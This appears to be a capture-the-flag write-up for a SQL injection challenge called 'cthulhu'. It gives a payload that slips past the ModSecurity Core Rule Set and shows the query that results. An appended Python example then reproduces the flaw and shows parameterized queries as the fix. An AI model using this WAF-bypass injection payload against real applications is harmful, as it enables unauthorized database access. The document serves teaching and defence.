
cthulhu

We are provided with the SQL query:

SELECT id FROM prob_cthulhu WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

 

ModSecurity CRS

The ModSecurity Core Rule Set is a set of regular expressions that Web Application Firewalls can use to filter traffic. In this case, our input is being filtered based on this rule set.

In order to bypass this, we can refer to this GitHub issue.

If we provide the following URI parameter:

?id=-1'<@=1 OR {a 1}=1 OR '

The resultant query becomes:

SELECT id FROM prob_cthulhu WHERE id='-1'<@=1 OR {a 1}=1 OR '' AND pw=''
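
The root cause sits behind the WAF: the query is assembled by string interpolation, so any payload the rule set fails to match becomes SQL text. The following is an added example, not part of the original write-up or the challenge code. It models the PHP interpolation in Python and shows the same parameter handled as a bound value; SQLite stands in for MySQL, and the function names and the table row are constructed for illustration.

```python
import sqlite3

# Payload and query template taken from the write-up above.
PAYLOAD_ID = "-1'<@=1 OR {a 1}=1 OR '"
TEMPLATE = "SELECT id FROM prob_cthulhu WHERE id='{id}' AND pw='{pw}'"


def interpolated_query(id_value: str, pw_value: str) -> str:
    """Mimic PHP's '{$_GET[id]}' interpolation: input becomes SQL text."""
    return TEMPLATE.format(id=id_value, pw=pw_value)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge table (constructed sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prob_cthulhu (id TEXT, pw TEXT)")
    conn.execute(
        "INSERT INTO prob_cthulhu VALUES ('admin', 'constructed-secret')"
    )
    return conn


def bound_lookup(conn: sqlite3.Connection, id_value: str, pw_value: str) -> list:
    """Hardened form: values travel as bound parameters, never as SQL text."""
    cur = conn.execute(
        "SELECT id FROM prob_cthulhu WHERE id = ? AND pw = ?",
        (id_value, pw_value),
    )
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    # Interpolation: the quote in the payload ends the string literal early,
    # reproducing the resultant query shown in the write-up.
    print(interpolated_query(PAYLOAD_ID, ""))

    conn = make_db()
    # Binding: the whole payload is compared as one literal id value,
    # so it matches no row regardless of what the WAF let through.
    print(bound_lookup(conn, PAYLOAD_ID, ""))
    # A legitimate lookup still works with the bound form.
    print(bound_lookup(conn, "admin", "constructed-secret"))
```
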
